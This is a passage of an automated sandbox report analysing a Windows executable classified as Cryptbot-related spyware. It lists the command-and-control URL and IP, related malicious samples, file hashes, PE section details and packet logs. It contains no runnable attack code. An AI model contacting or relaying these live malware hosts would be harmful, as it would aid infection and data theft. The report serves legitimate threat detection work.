              http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2020839491.0000000001925000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018015700.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018386317.00000000018C7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020572030.00000000018C8000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2017988366.0000000001913000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018071816.0000000001920000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://httpbin.org/ipbeforeB43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlB43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/hsts.html#B43WRnzSPD.exefalse
                    		high
                    http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwYB43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/alt-svc.htmlB43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://.cssB43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://.jpgB43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.121.15.192
                            		home.twentytk20ht.topSpain
                            		207046REDSERVICIOESfalse
                            98.85.100.80
                            		httpbin.orgUnited States
                            		11351TWC-11351-NORTHEASTUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1579965
                            Start date and time:2024-12-23 17:14:13 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:B43WRnzSPD.exe
                            renamed because original name is a hash value
                            Original Sample Name:76e5a31451eefe694a963ae5b65ecff2.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: B43WRnzSPD.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:15:53API Interceptor114x Sleep call for process: B43WRnzSPD.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.121.15.192foQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                            • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                            dWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                            jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                            6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                            y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                            qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                            6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                            kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                            • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                            AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                            n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
                            98.85.100.80foQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                              jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          rGABp2MFj4.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            x20bbVN4LA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                httpbin.orgfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 98.85.100.80
                                                dWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                • 34.226.108.155
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                home.twentytk20ht.topfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                rGABp2MFj4.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                pivGJnn6wN.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TWC-11351-NORTHEASTUSfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 98.85.100.80
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                rGABp2MFj4.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                x20bbVN4LA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                REDSERVICIOESfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                dWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.98594099143931
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:B43WRnzSPD.exe
                                                File size:4'441'600 bytes
                                                MD5:76e5a31451eefe694a963ae5b65ecff2
                                                SHA1:5517f0db4c84c605574c618567afa40274a1c7a1
                                                SHA256:3955f6fc16ce4d34bd50409f6f98825d3568e370f9f980d8e82dfbe8d7dbd04c
                                                SHA512:f41bde7c9e23383764f75b65c76f45bd9e9a939be4b6b72b92bbe2873a7b5ecaa73d6fbb62963378210698a93c5efea2908fc5d055dc24b3a83036ae03bd06c1
                                                SSDEEP:98304:2sIqNwZ5U5iJNRlqsew37aBGv+kxz3eBtjIaAdG2qkZ:2sIqNwZ5U5ih1ew37aBGvhzcDQ
                                                TLSH:E42633E76C776041F91FCE7AD98AD1A44390E8C50D8EEE9B280769F2344F13638459AF
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@...................................D...@... ............................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x106b000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                Entrypoint Preview

                                                Instruction
                                                jmp 00007F262D3806EAh
                                                shld dword ptr [ebx+00h], eax, 00000000h
                                                add byte ptr [eax], al
                                                add cl, ch
                                                add byte ptr [eax], ah
                                                add byte ptr [eax], al
                                                add byte ptr [edx+ecx], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                xor byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                or al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add al, 0Ah
                                                add byte ptr [eax], al
                                                or dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                or cl, byte ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [eax+00000000h], eax
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add dword ptr [edx], ecx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x72b05f0x73.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x72a0000x2b0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc690cc0x10acnazlro
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0xc6907c0x18acnazlro
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                0x10000x7290000x283400d2a8da05469a2ea6be7b29f7b8c5cb0eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x72a0000x2b00x2004983618d2ed48cd7239320849b8354d5False0.798828125data6.091720857337653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata 0x72b0000x10000x200d6de82d14e357527731a70b0d9d5c0e8False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                0x72c0000x3880000x200ffb98299c4d7e8d896bc35cb9ce83ef2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                acnazlro0xab40000x1b60000x1b540067b4b2bfbe44490a1fedde178f7d1f4cFalse0.9944080769368211data7.955898170729066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                qaecibqv0xc6a0000x10000x6006e0618e4b8f34463427d7ac0845f3005False0.5377604166666666data4.881999142634421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant0xc6b0000x30000x220081fbf9b5d8d06420a52e926b3eeb69ddFalse0.06169577205882353DOS executable (COM)0.6843955254926384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_MANIFEST0xc690dc0x256ASCII text, with CRLF line terminators0.5100334448160535

                                                Imports

                                                DLLImport
                                                kernel32.dlllstrcpy

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 23, 2024 17:15:25.994174004 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:25.994206905 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:25.994339943 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:26.006361961 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:26.006376982 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:27.743865967 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:27.766097069 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:27.766110897 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:27.767776012 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:27.767853022 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:27.770149946 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:27.770224094 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:27.777553082 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:27.777559996 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:27.820831060 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:28.770613909 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:28.770698071 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:28.770804882 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:28.780826092 CET49705443192.168.2.898.85.100.80
                                                Dec 23, 2024 17:15:28.780853987 CET4434970598.85.100.80192.168.2.8
                                                Dec 23, 2024 17:15:30.027894020 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.147526979 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.147634029 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.153435946 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.273097992 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273117065 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273195982 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273205996 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273255110 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.273291111 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273300886 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273343086 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.273364067 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273392916 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273411036 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.273477077 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.273493052 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273502111 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.273542881 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.393240929 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.393259048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.393280029 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.393289089 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.393336058 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.393378973 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.393381119 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.393416882 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.393476009 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.437069893 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.437190056 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.556986094 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.557082891 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.601011038 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.601151943 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.720889091 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.721004963 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:30.881097078 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:30.882460117 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.089082956 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.089231968 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.132903099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.133150101 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.133263111 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.208993912 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.209450006 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253020048 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253042936 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253093958 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253118992 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253138065 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253148079 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253175974 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253206968 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253215075 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253319025 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253329039 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253339052 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253356934 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253365993 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253384113 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253433943 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253437042 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253555059 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253563881 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253631115 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253654003 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253680944 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253688097 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253740072 CET4970680192.168.2.8185.121.15.192
                                                Dec 23, 2024 17:15:31.253760099 CET8049706185.121.15.192192.168.2.8
                                                Dec 23, 2024 17:15:31.253770113 CET8049706185.121.15.192192.168.2.8
